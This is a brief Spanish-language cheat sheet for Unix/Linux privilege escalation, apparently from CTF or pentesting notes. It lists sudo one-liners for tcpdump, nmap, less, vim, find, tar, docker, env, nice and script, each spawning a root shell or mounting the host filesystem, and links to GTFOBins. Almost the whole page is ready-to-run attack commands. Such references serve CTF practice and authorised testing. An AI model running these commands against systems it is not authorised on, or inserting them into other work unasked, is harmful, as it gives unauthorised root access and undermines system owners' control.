System Tools Exploitation

Explotación de herramientas del sistema mal configuradas para escalar privilegios en sistemas Unix/Linux.

Estas técnicas no son teóricas: se han usado en múltiples CTFs reales y entornos reales, incluyendo plataformas como TryHackMe, HackTheBox y máquinas de VulnHub.


🧲 tcpdump

sudo tcpdump -i lo -w /dev/null -W 1 -G 1 -z /tmp/root.sh

🌐 nmap

# If interactive mode is enabled
sudo nmap --interactive
!sh
# With custom NSE script
sudo nmap --script=/tmp/root.nse

📖 less, more, man

# Open a file with less, then type:
!sh

✏️ vim, vi, nano

:set shell=/bin/sh
:shell

🔍 find

sudo find . -exec /bin/sh \;

🗜️ tar

sudo tar -cf archive.tar file --checkpoint=1 --checkpoint-action=exec=/bin/sh


🐳 docker / podman

sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

🧬 env, nice, ionice, flock, script

sudo env /bin/sh
sudo nice /bin/sh
sudo ionice /bin/sh
sudo script /dev/null -c /bin/sh

Mas binarios en: https://gtfobins.github.io

Última actualización